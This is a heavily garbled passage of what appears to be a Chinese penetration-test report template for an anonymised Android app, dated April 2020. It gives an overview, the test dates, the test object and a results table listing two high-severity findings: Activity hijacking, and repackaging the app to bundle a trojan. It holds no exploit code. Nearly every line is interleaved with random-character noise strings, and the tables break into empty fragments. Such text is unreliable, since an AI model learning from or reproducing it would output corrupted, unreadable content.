2 y6 Z) [, I: g$ ^7 D+ E' }) w
9 n* R/ p$ J i# S( _! j% ]8 Y- m$ ?
' Z+ j. h$ m, B9 q) S. l9 L, d7 f+ l! r! V
/ E! w' m$ c0 C J! N* I
) z' D* _0 N; I# y( s4 c7 F
1 c" b/ J3 A9 x: k5 z/ X
$ g: I8 K Q. x/ V' p8 Y- F* J
8 r& ]3 e; e- m7 o1 I
V, }( I) W) O( O2 S
( Q' m M& z8 x i# g. N4 e, W: h1 p$ t
文档编号:
6 X* x" I A9 U6 q3 _ z/ L4 W7 U9 ~$ q5 v- A, `$ U
1 O* k! z/ u6 ]' [4 S% y" N0 E: @
1 J, U# u% h& S) f: y" b
7 }$ A2 r% @0 k9 d( b; `
* K8 L2 f( W. Z5 u8 G6 S7 o0 ~
& V& b: v4 U5 F3 Z3 |- K
% c; c* D) a3 l7 ?) N
- ^, S8 Q7 d7 n( r
& I/ Y# Y* L# Z
& I4 O; }2 L- W& y* G4 [; a7 T
5 _+ z0 c; b3 G% ~
& J" I1 w, L& p9 A
/ e" N X7 Z3 X: H+ k$ o- l
3 P u; L# y" r r6 d; W* d7 b$ y9 }1 \) ^# Q: Y0 r& W% {
( x7 P" }8 W; B: P3 E: q# Z. R, I& R2 h) g, |
% ~! d- q$ y l; _( T k* j
' D* X* ~8 O9 Z6 {7 M
! \: |% ~, i! }3 \% L1 H: S1 O
7 I' n, ]& Y ]; L( k0 s8 A# Z 9 o7 I9 |2 _) K0 w3 @! u
y+ z4 @9 O9 \5 V$ x
% K/ V7 l$ `! T: ?! j% I* H; K* i7 [# J& z2 B
+ F( V: b% _# B! C7 O5 V& X# T1 @
: X$ g5 s3 V' U! A. d) S9 A) c4 P, B. r6 n9 i4 F/ R
& |- c1 b# F- H) K( U* R& ?4 k: ^& m: n. ~0 K
: A0 m% ~2 ?( }9 H- P
" @4 D* C: H, I
* N6 U/ e- ?5 w
: |% B7 l9 [, b1 h 某某某APP渗透测试
1 J1 g, g& A7 F. g0 M# W; D/ a( y. Z% q9 {* O
8 f- a0 g- V9 {
! Y- s( A( k1 x2 { 6 N% y" u1 [9 N+ b0 E
. t0 L4 R; g* q ! W q/ |$ b1 u
7 J, B5 c( Q& Q+ i
! e7 U5 I H+ \$ M0 g2 @* ?4 X% C
7 y, [3 `# L8 g: r7 A% a
% ?' x2 a9 C/ N, X' U
6 v1 u- ]/ l$ C- k ( X9 n" \# {: l0 k
1 X3 K n' w( M v/ M
7 k4 \0 W+ b/ j1 w3 N5 B9 Z2 G) D B% T" ~& y6 ~
, T H6 [ f1 n! {: C& b
6 p- r0 w9 X* k$ V v* J# V 9 M1 N0 J5 v1 r5 q1 b, \
7 [; n: G5 D9 r) x! h8 ]
; j0 Q% [# a( v$ `2 ^6 l9 l4 t: Y
: @1 a" d! [0 |# ?8 k ' [3 f% ?4 p* F" P @
- b! U9 ^( v- H6 T
1 \3 n% a2 y/ w* ]& _
5 z. e5 @) R) d8 U! c7 a1 _
# ]0 m* q5 Q1 L! y3 h+ ^6 ]7 C' i! F" I' z& o' U
0 f3 z; M; ~4 z9 z# B; I! l, m
/ ~$ h# T# E9 _6 u) s+ h
技 术 报 告 ! ]1 B& i/ E3 y* Z3 A
8 P, A7 [# z1 h" }$ k
* Q0 ^* X7 m9 z. ~7 J' b
' L( R& }! y( j* K6 v$ K
$ r6 W! _8 ~+ n! q+ }" Q9 h- D1 y% i. m
* Z* u" k2 a+ K! O" O
2 P, }0 k. ]1 a2 c* K4 O% I% K, T
' R- h! n; U9 b+ c( h, k( u
+ w5 ]2 ?/ s& F% ^" X0 t
4 h% O8 \5 ^, o
" s* ], E: p" _1 W, f
4 h; q7 x3 Q" M0 Q' f1 J+ q- _/ s+ `: K9 t, H
7 e$ Q( P- J) M& d0 [, x
, U' y, |7 U. f) v: z! D' O 7 L5 C2 |! \8 X' G" A
A& n5 {) G x9 X& N( A; V
$ ?/ j0 X" y, E. X
' X$ h2 |8 H8 [: I1 U* @4 L
6 b) O" i0 _9 C1 _" Q
- S. E4 i/ f, X4 v. L C4 z# L( h# x" F8 u9 ?, b
/ O3 ~- O9 Z3 z9 t T % S7 l( E; J7 ]" J
3 \: c: \; _; Z6 v% K
% P+ D; W9 t# D H9 i5 A
( n0 L5 a8 e W: W* {, d! [ ) N. m8 }( h3 B: a% V5 B
L7 ~" c5 w9 P1 y' x4 e
' Z8 @- _( l6 p& Q% p) @7 q* B4 R( d6 W' T
6 h- v7 _7 z; J# \3 n5 F; I. L7 Z, L2 v! ^- |* J* z" g* Z
% K% P! @4 @( S' _$ S& ^6 z
; d+ k* X7 G+ S8 N, P t
4 \3 i: A+ ~$ B$ m. r0 h% |+ X$ v; v" R* y: ^# F$ v3 M
9 ]* _% r8 _2 I* P; J7 [6 l9 g5 X* o4 K4 b% @5 a7 Y
0 d# P! }4 { i. l/ G' {1 L; r# ~" @' V$ L: N/ n+ j
# D. {; W( z9 [7 t9 `
3 @8 w; p& `+ s& H
. H9 X0 k4 y8 j- ^. a5 B9 R/ R9 z0 {
6 s2 I( s: |8 h+ o0 O
% @% u' c: P- b/ C( {/ ^/ D! B
, a. A* k; Y" S3 P$ X- F
, Z7 W2 T) j$ X" _4 F! {+ G6 E q' @; l4 a8 `8 }/ L
$ U" ]: Y4 \( y8 X4 i
9 q: _( v' I- d+ {* D( c6 y # m/ c- H$ o) ?6 o" l
+ S8 C' M. e# a# I. N' l2 p
1 w$ a6 h* N! ?
/ E, b6 X8 j7 c2 O$ m
& b0 C' g, J1 {6 `! g9 I
/ U h( {- U7 F' k+ f
7 y( J3 T4 D& m% v( |; Z; L; K& P- P% ~+ ~$ P* M3 W
; X0 Q4 e, Q0 H2 M
2 R e1 {" j" J' R0 g1 Y6 x
! `$ c* f$ k" o: B' `$ r5 N" Z
9 l5 |) u1 o7 v0 {# S; z
k& X+ h' L8 J; M
5 Z( @( ]# R6 R2 z ! j+ P- Z4 t& L F
" S! H9 t$ Y# p# K: Y C6 F
$ G5 i8 X' {4 `, i8 M4 o
; {- b6 y: N# a ! n9 c& d1 v9 [* J( }( s
( o6 ]; Q4 O8 {2 g! h7 w
$ W5 x5 R+ \, ~7 v; Z% u. U! ?8 c. {
# D. z: z1 k; [9 l/ ~* {
5 V% X( _% _0 h4 |% s+ T
|* @* |. | z
+ A4 [- G/ L" g, T0 ]
( R, g. Z- o2 E* d& M% ^5 l& M* D; G$ l& E; L9 u0 `
) c2 m, m) O3 s
9 l0 ]" b- z- S
0 y2 [" { q7 C5 `% H8 x1 r
0 Q1 K+ ^* l3 e' G8 h: @ 8 o% I" P3 c. `
6 ^+ p; }* ?9 s$ s5 s- Q
" C( w$ s5 @/ U! q! d$ v# |/ J4 ~) I M9 u: z( V) X
' N" }& q' e- v4 P/ w* E6 _
8 t: P L: s7 }5 X9 \
7 `5 s6 p- Z! Z( p! ?6 r8 U' t
1 Y1 E% N& v+ G' A3 p
" Q* c2 R; G& Z" X1 N& j& Z u/ J- S d( y; T: P5 h
+ A7 J- c8 S6 _
f u) M: H9 | x8 x' _ 2 e: |0 I/ @% X2 b4 R# ?. u7 B
X) i$ O$ v. m/ n$ p8 M3 l
2 D! y, Y" w2 ?8 e- T" G* ]5 C; t( j. C7 o
) N2 J% g; `: f6 H0 z5 K- N
+ d- W9 h6 y1 r) B4 q( }& l$ U6 M 3 Q) E8 X7 E5 s. _
6 n$ s& e4 Q# F Z
. N# U+ i6 c, Z$ Q. ^" a& ]7 }* {* Z: `
, b0 [, @7 X9 T% f
4 l" F! @& o# @" e
- P- H( g' d- {8 {$ I' x
2 g* T6 @* @' m7 n, ^$ A
# [4 C4 Q( e$ U) }/ [7 l. `
3 ]4 O* `* h' B; K/ p8 _
$ Q+ z1 l F i! j6 k
' U- p( z/ D# g. F3 [& x" D
二〇二〇年 / n1 `7 v+ R0 X1 J" h3 q
7 q8 x9 J; @% J- N
- p0 |$ }7 B4 s" U6 A8 r) d
3 g! T* _) a+ ?; h0 x! Y; `' j4 a
( P( [( R, H( J! V7 X3 A
' z+ B, m8 ?$ a. {0 \
. e6 ~* c8 p9 u; V. w
6 S! I: ?' d! k t' K) O
; W9 y) M+ o9 N
k1 t6 m& a, o5 @ 6 R: d7 ~& s8 w7 ?
6 v6 M. [5 E7 u! g3 b+ `, p
& n7 C' c3 E& P. j
% B, L% V8 q6 l
' p3 C9 d6 H. A
) O5 J5 n# J/ i
" J% U! s1 X; x: L9 a/ F( O
0 |1 w6 u8 B; _! H7 ^
; @: m5 U) R6 |' W5 O- c9 J2 J) u4 B3 Z t) k5 G# }
# D( q( W; {8 R( V9 ^
5 D. [) L- R$ m$ {: m
目 录
1 X" @: |! U4 A7 z
3 z3 S$ K8 z2 B L7 ?
$ _# a- | f% Q9 I
3 P; t+ a' {; m2 O8 n4 d+ u
) I& P/ R5 X7 O5 r3 h& e! i* u& z5 p! g3 g& u
9 s3 ]% S# |) s
. Z- |/ ~& G5 p7 t S
) s, @: D( k+ I9 _ n' d
6 {0 U, \1 W1 c+ c
# d) Y7 d* Q1 w
/ S& |) Q' J- J" F8 j! p b * J8 n7 _' R" A& ^0 T) _1 R
3 p6 k: l+ \* W' n$ i
1 概述... 3 + |+ ]0 [" p7 m9 b+ p Y$ `: G
6 m9 d) T7 ~- S, T. S9 }
# z& D& F9 I! l0 ~$ o- f
! ^2 N" T0 g9 O0 i! L: M/ H
, ]) r9 z5 U* C1 n5 i; T; X) o
- G4 e+ q; n, g" H 1.2测试时间... 3 7 w8 r2 s* o1 E% O$ V& t
0 g8 l0 @- d, ]5 p( k
3 T7 @1 S N$ ^; U( I) k
' I/ n) b9 g9 N4 m6 w3 S 2 @4 U) A2 w8 ]
: H e7 \ Y" V' w+ R" H1 n
1.3测试对象... 3
# U5 J6 ?% c2 w t9 K8 V, i' t
% P" j( o# } B7 G: m+ R
& u) m4 n1 l H$ J
- d+ U+ x Q7 j
6 E$ i5 Y& v, l9 i' ^4 C3 P8 N$ U9 h+ {3 f
1.4测试结果... 3 2 r+ D3 v' {. m& d8 b* A$ d
: |" q0 B" P! t! d6 I: w# f( C0 F2 {
, x2 S, ^, B) }" k" F6 ~0 M; G
( x' p6 m4 |' n* U & e6 u2 s t4 D: t$ O- S
. n+ d: k( [+ I! l, v" D! m 2 检测结果... 4 ( t, M" d% K' \5 F
/ H: v e( K& @) {; y4 {4 U! f
5 K/ p1 F" s6 v! f% T- Y6 i. F2 V7 f; d2 R' @+ H1 P, j* L
# _, z o6 h. F, n: Q7 i
& ^: M0 }6 @' L! J8 u( @3 A
2.1 某某某... 4
( s9 [; \% o8 c, L, X p5 }& }9 ?: c. s, t6 g
, l3 W* J9 V4 S! z+ M5 v- K
1 W& j2 b9 v" O, P) M
1 }& ~; w: B4 c$ h! w" C& D9 e
) ]! Z! |3 U$ x; G7 }
2.1.1检测目标... 4
: T1 `1 w) q/ a3 N$ J1 y
* n/ R. b+ v4 t4 _+ Z9 ~
' }2 x& K1 b' O5 C9 C5 `9 `" C* S- h
. R$ G ? O' h( g1 y: ~) s( J; s5 X, L
1 ~) u. E0 i1 X2 U, i# q% h) B6 m3 i
2.1.2检测结果... 4 ) j7 L$ b& i9 o$ C4 U+ }* p
1 q* g6 ?+ X2 N+ i
- c& t! b8 [$ C1 w/ V& B! c7 h/ K( F& U; K
3 e ^% I" u& ]7 p' d+ q( b4 P Q
2.1.2.1. 4
* }) T$ n3 G& W5 C# \) F" ^
; z6 V# ~% A6 z* _. b% p2 e u
; I0 b- c3 T6 H+ n; h. a! }+ U0 N1 [
6 t3 y3 a& z- Z5 ~5 ~
" |" p% F* @1 d) ^
7 ?* m2 L X9 l: R9 T: N# o& c1 v 2.1.2.2. 6 : |: g% y1 l3 A7 e( o6 G
j7 ^/ C/ d2 M) G! {: ~
& k) I* {, z& A
$ t% u8 i" F9 d/ X0 \
# x l8 l( G" S. C) D! _
/ H& j* }5 W4 o2 e $ N2 P$ s/ U1 ]# K' e, D3 h' S
0 Y l6 J5 O1 H0 Q
! S5 L' N7 r4 O% y5 x8 |$ h1 i/ e# |6 f5 ~
& c8 d7 h! \/ ]6 t
) L9 f6 ^# D3 F% c$ P ' v6 l4 B9 f( O8 L
( T! ^6 m" e$ o% }+ G, c' V" G l; \2 f& Q
6 |' F. t; C2 {+ T' J. T* B
2 M6 |$ G9 [/ x/ A/ e4 i6 h
3 R1 T) y9 J. N8 b% T: t# s7 A
: x) |. P- P5 P. g4 K % O5 v f0 z# o* A% P8 ]* I4 A
6 S+ w8 z' f$ a: G3 ~# L/ x
1 概述
( Q X* U2 m! J! K' @6 ^: V
! k& P- N; v" }6 x e# C0 r
. t; F& ?5 R, }+ J: B9 i% p& _. ~3 Z* {& @. K8 z% a/ ]# o
+ ^# i& \8 w5 R- U! X7 K& D* S2 z: l: n# h
1.2测试时间 4 d2 Y0 T+ O; L- I
4 Z4 C X6 I" l0 ]
! K& X$ u5 G9 p7 P4 C7 C
6 W* I/ i% u) `( N) Z9 F 9 b) b; I" D: W1 `" f9 ~6 w6 O
1 m8 B1 s( U! A! c+ K6 D$ S
' }, N0 {, ~: C! Z4 Y( N- T
f( x; \9 O! M5 y9 O 1 e/ q& W( K0 e8 u( r
5 L( y$ @6 ~5 e( q | ( `# M4 ]! K6 d3 Z
2 j. Z' P2 ~: f$ O2 U1 I1 w
! u6 j2 H# j5 u [- I# h' o: e: ]/ { K5 W: D: Q0 [; q$ M
渗透测试时间
5 L, i7 M4 g( [6 F
9 T8 a, v3 {' B ) I5 v. I9 v9 `2 B! n# j
: {" A2 k* g; ]; ?0 Z3 Y | : W. E( A" _5 `% q4 k
6 M ?% I2 w: P5 T2 F0 g
' m6 p; ^# X; ]7 l! L! |; k) T7 e! ?1 ]5 {, `; V7 f3 D
: T, E* ]# q8 D) @6 \5 E
0 d$ l* y$ o5 P9 g+ R$ j" Z& l7 E | , T# w" u7 v$ h- O+ U
+ p: @" V; F, u9 Y/ Z
; T" n w) T# G. ~, n3 Q' K+ z& V6 F* h" ?1 u8 [) }2 k7 O9 }
起始时间 4 [6 d( F6 R% r4 D5 r: G
7 z4 D# p& D* x* _ e/ g
% _6 \ [) R8 ?/ U) n4 c% P" i" A+ ?; U1 k
| ' Z; ^; W' X) z* c
% C3 d: C! O& c- L
/ t# B. P/ e$ j
9 Z( N# m0 ^! D0 v
9 t) g* ~% b8 w3 I" h' y
! ]$ _2 p% M' Q9 n1 @ 2020年4月6日 9 w8 t' \2 Z2 v ?; c0 n$ h8 I
! T+ P- L' p2 n. O6 M+ s/ x' a
7 x1 p3 y/ r8 n( R0 T! w& \' U' m, K5 }( U- K0 I1 R8 @ e
| & Z, N% I) b ?7 y8 r1 r& k
4 _+ F9 t, l: s! h
) \' ~% }- n. D2 {/ C% C% N
! q4 _: ?1 t) |, L! c
5 d- B6 C+ Y' p" [) C* J
w9 h% M# |3 Z | ( r/ q5 X, y I+ l* }5 w
0 @) `5 ^2 j$ [* B' V r- z 5 B5 ?. V9 s% n( x# d# ^* P* _
2 \. O. v7 Z# J3 K2 w. { 结束时间
7 C1 R! _! U6 S* @) s
8 e5 j9 F6 }/ O9 w 0 m" ?0 y" w7 T/ X+ H8 v& a
( G: F5 S( s& H! p4 j
|
- p4 d+ _- l; _0 Z0 I& R0 T
1 E& U; D0 K9 I- }# Z6 @
6 U9 e8 C. u9 h/ J( Y$ r! b; ?7 }" y
! u- \1 w3 B/ h! {6 y F
: T; R) b6 G6 Q5 c7 H 2020年4月9日 / u. S3 c" d8 ]" ?
4 r# ^' M# I. n# W% U) F( q1 ` - c+ |# e1 g, G* y. \. ~
1 ^1 [( O! @1 I" Y q | ; @4 y' R5 B* o4 W7 L
2 l6 v# s: l8 k$ @8 J# w
/ S1 A7 _! m1 L! C
8 _& [* Q y% z9 \9 b ! N, I( a# _4 ?. @0 i
' t8 q) U& O: d. O# M+ @- A: a
1 Q+ [( w9 _, }- F! @
) [5 c1 {0 p8 N8 u" ?' M/ ~
/ n( c7 M4 z& @5 ?' a! ~! i1 M5 G% I8 R0 ?7 Y. I, e5 z% n
1.3测试对象
( W( p# M) z8 }, s$ e
6 W8 K+ p( j$ X$ H$ c
$ n- S: A1 _9 u$ R3 x, T
( k9 e- a8 K2 C/ B& v! e+ o ?+ U9 k
+ C& u* w1 z3 n; f/ D4 Y. T% _: t) v( F! V
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
5 ~! A8 O% Z, s# _/ P: K U# _' ?5 b% k7 g5 _. ^' M
& ~- x: A3 T- }0 b; W- u5 ^
; c0 R* A5 i% L' d8 g
' s# L/ ] Y% S' o' R& O# ]+ [! d; d3 o7 Y
表1-1 检测对象 " ^7 T9 f& g! ^
* @7 \# u: G( Y1 i
+ c$ H% @! K! f
8 i Y" Y2 s# z' @% H7 I& G
3 j, _0 o, J! D% x# T1 u
- U3 l$ x7 h8 a 1 p/ u+ L2 ~! O2 |; }
/ z/ r* l/ F# b$ a
! O+ Z# m- c9 {/ H7 O3 b) J5 @# G5 \
. O6 s9 P7 C1 k! V | ! {1 `# t; j1 P5 [; V5 ~
$ ~& ]/ h; H6 L: G3 w2 B5 p
" j, ^9 u8 h; }" m
9 u1 `( R& Y- t1 o; Z7 u- l0 [ 序号
" w/ Y1 E* a1 s2 y! r2 u
6 N0 H6 I) U5 b* x# J
" e1 ?( c( m. ^- E+ ^# Z' f. @" e, t! P- l8 F; J# J9 M
|
: O& S6 J6 X8 i, x# [2 h8 @; C/ c' L+ e
! \' x5 N5 n/ D* ?; R
+ a( q* E5 F% c( c7 a + T" G+ U. s$ c; C
4 M0 Q" Y8 v' S: r2 J* { 测试对象
2 K D3 g, \' c' A" [) C/ ?
0 H, B" p3 G5 w, k1 [( r
6 P) z2 j1 y( ` G$ n& S- o' ]3 d7 k, [; t
| ' `" S9 a `7 K, Z6 _1 G
& g5 g5 s% R+ n/ n
+ H7 q; o% A, J2 r
( i( |+ G* D% S* M, ^' Q3 R
, n, Z- D) b9 }" R8 v5 n+ O
/ `7 m! Z( w/ G# O6 C' g/ L 测试地址
2 l, i) g$ Y. K6 v: K: }+ ]
7 H6 t8 S1 p* I" [) V! g" g# S
' X& [/ M# Y: b% b1 ^6 Y- ~- ?! @
s& X, Y) n' Z$ J' r1 a |
R, u# H% t* A! {0 ~( N b1 p" K% p7 e
1 f, ^5 c& Q7 s0 o 0 e" l* a8 p8 Z$ K* D
; x* u6 `2 V( j
5 {9 o1 S* [9 o0 \# [
9 n+ e: r9 I3 I2 ?. x 安全漏洞
7 j L3 M* r+ r( ^; Z# L& K" F) a' N: ~8 Z5 F j
2 I* L2 D% O- t, \
" h. S7 q6 R1 w! [1 E8 V
| 8 ^' B" I3 D; I) A
r8 b# r, ]) g0 i2 N) ]
+ g) b8 B0 e( W5 `1 b W) g; u0 w; t9 E! w+ s4 L* Z+ ^
! V3 a! I/ \- u" E4 y# }
. U9 _. B; o# \ u0 ?9 h( H& f |
" ~( u! m2 P9 H9 O$ j6 |: v
( ^4 h$ x) Z" j5 H0 \& s d6 K% d 1 P% }9 F. E, f4 \) a2 N' d7 N
7 o1 Q% o! L4 T' { 1
4 ^% T7 B5 t! P3 `0 v8 x3 b; ?. Q$ i C, E! f0 B. b
, ]8 ^" [7 E9 W5 \3 ?$ \+ g* [
% `: e3 o& w; x; @9 |. \ | 7 z$ v5 s( e+ e2 d$ M" L$ a4 f" S3 @9 J
: C% B6 I* V, |9 ^' A
- A. @/ Y x* n
1 S3 [* e& S$ _- s5 W: v. C . y- O6 j8 I! ~/ N
3 d3 I8 O1 Q% R. {3 l+ c* s* O) i
某某某安卓APP
( y+ A' } f6 A1 `& v: v
: [4 ` }5 H7 b6 w- V3 g( Z& a, j B * K; G7 T- _* D$ X; V
3 Q% L/ x# t8 T5 `
| 5 R7 O3 u! e; c( L- M$ O3 f% P- u; s
0 e/ i; q1 ] Q" U% `
K7 T5 `: [2 z: |$ j$ w, Y0 x1 d8 [5 `
( b+ `; A* ]; \
7 }% Q0 n- r. l9 \6 T8 Z5 p" f
* U1 ]1 O4 ]" B% D& H( h
; I# j! S' C3 C) U1 A7 ~8 d 0 x$ h& \2 ?9 ^( q4 H+ p8 C! U
& @6 S* E5 w4 m6 R) s5 ~! A1 r# ~
|
! n8 ^% z, t% X% ?+ @1 X
' n4 d; {2 M w7 |- w% z+ _ p
8 o% o. ^8 w4 e- N* z' V- c/ s9 O! i6 M" q6 j$ n4 Q7 }$ R
/ l; Q, z M8 u# S1 E% c
- H$ i3 m- X* e2 v9 I, j8 } 2 5 S5 s0 [' ^$ a- A; b9 {
4 {. c5 V7 s% t6 d# I5 P / m7 {% J- w+ b5 [% u& [1 H
3 ~! Z; }+ n3 u* P* j6 i! b2 Y
|
5 w. V8 |9 `* U U& U, w) r5 @" m% D2 x( Q( R8 K: s# ~: }1 \
( I7 m6 z1 c# j$ y" M+ c' d. i! u+ j
% f* w$ P5 S0 |, D
5 b& E; H# Z, P( U9 B7 h& e7 R9 B; w3 N7 }. e2 ^. N3 B# l
" k' N" j& T) j0 ~ v6 z& x
5 m6 l+ P0 W) W
* A/ W3 v+ s( J6 B( C4 ]7 B {- y6 t( e2 F- \' k
1.4测试结果
( @. }1 ]3 Y) ?# t0 x) ]# ?1 ?( b1 }* W8 r- V- s
8 \: K/ u9 V% o# Q$ `" S
k1 L3 n; N8 d! v8 d
4 e8 Y0 L* X* z2 z1 ^# e- t1 E$ U/ }2 e5 i5 u& T( M: Q
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
+ W' {0 @9 r! w* G5 A% v, a# l$ W9 y
* G4 }7 p& x0 d% q. P' i; X2 s
4 }2 |6 {% }. @6 t
1 C1 Y: A% E) T+ z" w
- z6 v$ o$ a9 S3 H) N: l9 A7 K# x
' R/ @3 j( D4 B1 Z5 R |
& I8 w5 }1 D. P0 W' L% V$ z% X: w! f
% j+ {- S, |- g9 W, |. k0 S; Q5 v
; M' p n. @. v0 r 0 |6 M) l `8 j8 y
; s# k* k. ]: ~" P
( ?2 B6 O$ W% y0 d0 x
p4 L/ Y# [; B; @. X
. A7 r& z" W( M; u1 _! z' ^
e/ Q& H! O/ `# D
' \( ?- Y; I7 |3 R n3 d' \
! B: R- L( G$ g ?6 h/ L$ ^. {. _ | ! C6 v7 {/ w+ x; k1 C
( y0 U/ h3 n/ C0 ]4 `9 {2 J" u $ w0 k9 f( t1 O( }$ ?
7 S! q/ T, U" ?) m- G% l! d
序号 ; M& t- k! G: x/ S$ V" A
6 s9 v. T! I: @3 F* [: | ! X8 [8 S; K0 x* M( C
, j" S1 V; B I Q' @+ z$ W
|
: M# n- t' q$ j2 Z* A& r* ^
$ W& Y% [3 i k6 k$ |+ z- H
* F1 Y& X9 e3 k# P0 h! w/ @7 m4 O
! _" o m/ Y6 P% f1 s _5 I/ w3 q 7 ]/ _2 r6 p' I: a _
1 r& t! L3 h+ ^( R6 L, n
系统名称 / x+ o8 s9 J8 m# h
8 o0 b6 w; B& M% F' F3 w) H
, a! F+ J, N4 m0 j. x; {
% N/ x" q8 P" w" x
| ! \+ m9 P! e2 a
1 O0 [; f6 o9 H: j ( z; x: w& k, m- [, N/ G* u% O+ c
" z; C& m" M6 z; w, x $ W6 X5 {& F+ [$ X
; l4 u9 H* U `( }5 W) ?
漏洞名称
2 p( t) \. i# A/ p
& D2 S. t) R& t! Q
! ^, K( ]3 H0 d# W
& Q$ d: d) f; Z ^# R5 ? \ | : _& y9 |6 y3 f; o
8 _4 V' L: s: F( ~2 V
J* |/ T, a# Q
) M* _5 S5 c8 G" o0 P
; O6 z) j. @ h8 q, d' a" p/ ~6 f8 n) |
漏洞危害
; J$ o3 D; E! ?9 w9 F% R- L) C. C1 {/ I% F
: Q8 Z `$ M1 X6 u' R$ F: b1 O' G+ d+ G5 d$ _
| 0 D" D; q, y, _" i. F- P
9 n* o/ w3 x: A) [
, C1 h# G R3 C( G0 I8 {
" Y1 k* k4 ^4 z0 }4 y . ]) V* R6 i( Q# t9 S4 ?
* ?: O, A3 f1 t 修复结果
3 i9 X: J2 J& Y ?. w% T5 F0 X+ A# L! P( P; F" h" q' a
+ K; I+ v5 S9 t6 K7 N3 N
0 x& h$ X" u. B6 P
|
& h- v# d3 g1 q3 u- n. p
# w& l, v5 b7 f- M
* f. N: ]- X2 k; N
( H' _& ]$ a' ]' C + {8 \/ w7 a4 S. p% |* Q& J9 L
$ [& h6 b# b9 _; b | ! y+ o! ^$ n/ Q, A* w( q$ ^$ ^. h& ]$ {; r
& m7 j! g4 B, \3 |- v- D; v5 n # l p/ R8 Z& k& A% |
( r+ [4 [1 |" N# g$ D 1 # ~% ^4 {. j+ {) }0 S H
! P! Z" B& Z" F- p5 K8 ~7 E
# h/ r/ G% ~% g1 i$ x
2 D; l4 f1 W# t2 ]
|
8 z- B% Y! ?: @/ O* J+ s& L4 t0 {% y5 G0 ^+ W4 z' h9 V
8 y; p4 U( R8 C1 D
/ m- I k8 i, x3 c. Z ' p4 c2 V5 x* O4 x* ~9 y! v
- i5 T3 z1 j: D/ D! Z! v, d 某某某某某某APP % k. U" A2 ^. x' n ?: r: M$ N
7 b' H' \. V, i( i
, T: N6 z8 E. p, I) C
$ y, G* P, K. K6 U4 W |
; T/ ], }" n3 H9 N0 c: r& G$ P. U" o/ Z
" j* U% J; F9 \, H
9 E) i2 B! ?9 w7 O! S
4 \" p- O3 g" ^& E9 V$ L3 u
2 W8 |6 k, ~3 E6 M2 C2 a Activity 劫持
3 u5 v$ Y- ]% P* a0 O# V3 Z3 J6 p" Y+ L2 a+ m' F
: L* K/ g5 @- U$ F! J _
2 c3 B$ K! q- O' J. ~
3 J4 I! C, c& M, O- v: ?5 c
; U: H! O6 D- `; K ) C" T+ ~$ j8 P& U; e. ^7 S9 G
/ E( ^" y: m8 k, [8 W / Z6 R# c6 [6 T5 r& O
. } X3 S! P) I$ Z2 g |
3 ?2 r& q: ^/ Y1 X. a5 a. h! F9 B$ y- ]/ G
3 z7 q! C/ v1 r6 ~6 m# i7 y% e* q) y# {
, e8 y% E/ ~! ^# l1 R8 }4 X5 _( p
9 Q, J; [4 d, W: T% \
高
" D+ [ R3 h4 w
3 y0 R0 S( v- C ! Q" l9 t( x' Q7 g/ P
, _/ {1 u& O3 B% t# S; K |
- {2 f8 Y( e) L' o" ~. ^. S/ w0 u" p7 Q, v* y
: g$ \( [ E, ?; y. `
) o- B+ S4 j# H$ Q# I0 S" y5 m
. o( v1 O& H9 j6 q- |, E, O# V6 q5 @9 ]
0 b0 t0 T" [5 ~2 b9 C1 H$ M6 |- N
( {8 b L8 w& H) V4 q( ~% r/ p# G! W
1 d8 Y0 f% ^3 J& M
! N' ^) T" Z4 G% \. i0 ` K |
, w; c$ M+ K( a3 G9 |& j$ N. Q% a) L) S% w* T$ y8 C
# @& A7 n& `# G: ~) C- f
4 T8 F! |6 ^7 } # H+ A" D- N+ X3 F6 L) ~
3 m& k% m0 J! d! |* K2 \ |
+ }9 u" C+ p2 P* h5 C- U& ?5 l* \$ w
; D# v- I3 A d- T
0 G0 I0 L5 b$ f; K3 j' V7 I
2 1 _3 ?% k, C6 d! t
- i1 @- Y% {; L' u( ~: j& O6 y8 c
7 ?& I/ O8 |5 f/ n8 f
/ G+ c( h8 @2 m8 G/ B8 Y
|
. Y( \6 Y) G6 D# e+ {: v9 s( t/ J' M* |; ^; O- a4 i8 a+ D
# N* z6 j ]& O9 q
6 g7 K9 k% D" O( G5 B
1 ]/ r" R3 F) z7 p. K
- j$ f2 Y, ?" d. i
某某某某某某APP
- r3 x* n5 B+ P
8 E4 i* l! V: R9 M7 N; ^ / a9 f7 {( B- y. d$ `+ i; c
4 |7 Q! l; q z! M0 s | : r) z8 V$ i2 e/ z6 L+ ]7 A: K+ T
; a2 O/ Y; @: T5 B) V7 p0 Z 1 |% m3 Y8 ?1 l: G& {
. L, a7 n0 I& d d& A) _+ @
" m, J, U# Z' F: F) \1 R0 I
0 }2 p% u- Z0 b 反编译二次打包捆绑木马、篡改APP代码 , t& @6 l! O q
& O/ }' ]; V4 g# a& N J
8 \- ^& h( r$ y# F5 b' n& R; q3 p) H/ _
|
) M/ \+ ?9 v9 b4 z: R! ]
w/ W5 \' X9 D$ r
2 f, k$ U% p9 _6 b6 y$ n
0 P# K9 X: b* V
$ ]' S3 s3 ^7 v1 J( ^
7 k, r5 y/ P8 h; Q0 U+ I8 q4 y 高 8 ^$ h j, |6 N `' B1 p6 v
& ~( D, X8 K) v B7 M! [
& b( x. v2 Y: g7 {
( i W% Z& ?2 Z% [4 f |
) [" S9 l- K0 t
* P' f6 q) r# M9 o9 a! i, r " _# P8 R4 m! G8 S
G7 x- o6 p3 k7 d3 n! S, l
- ~; F1 T9 N$ C
, e/ Z- N; g0 W4 v1 b4 j
/ `; }2 f% } c4 g: d) S2 C+ k
2 U7 R# F; {7 k8 {; o* p * p9 I+ X. V: o' c5 L; c
8 d* t: r5 {6 ]+ ~! r K
| ' B& [, |3 @0 R7 A- W% G, c4 k5 Y5 E
$ C4 b3 b/ L2 }6 n
}$ Z) {7 p) x% `/ a% O8 ~
. _ _4 _0 i$ r
) w; j0 `" n; D! `7 o2 X" A7 P6 m7 W2 o7 Z4 ?+ x# G3 w
6 I2 [0 [ ~ {8 d7 |. R( S
6 m% ~% I* z( f* A9 k0 W( ^! f- l$ c
# m9 x+ [0 K; a; J
" D: ?) k( t) X* Z9 g/ q( h& r+ c5 j2 @
" O3 m; H w6 p! b8 a! ~
$ N6 X' B8 f9 H! s9 @9 H/ X1 ? , H3 F) D* ^' x* X+ }0 W7 F
! ^) |% D: s2 J" t- _+ I7 p
% n; U" q: f/ Z8 m0 r" Z9 S! l/ b$ z
. f; S% K8 q, n P% D p
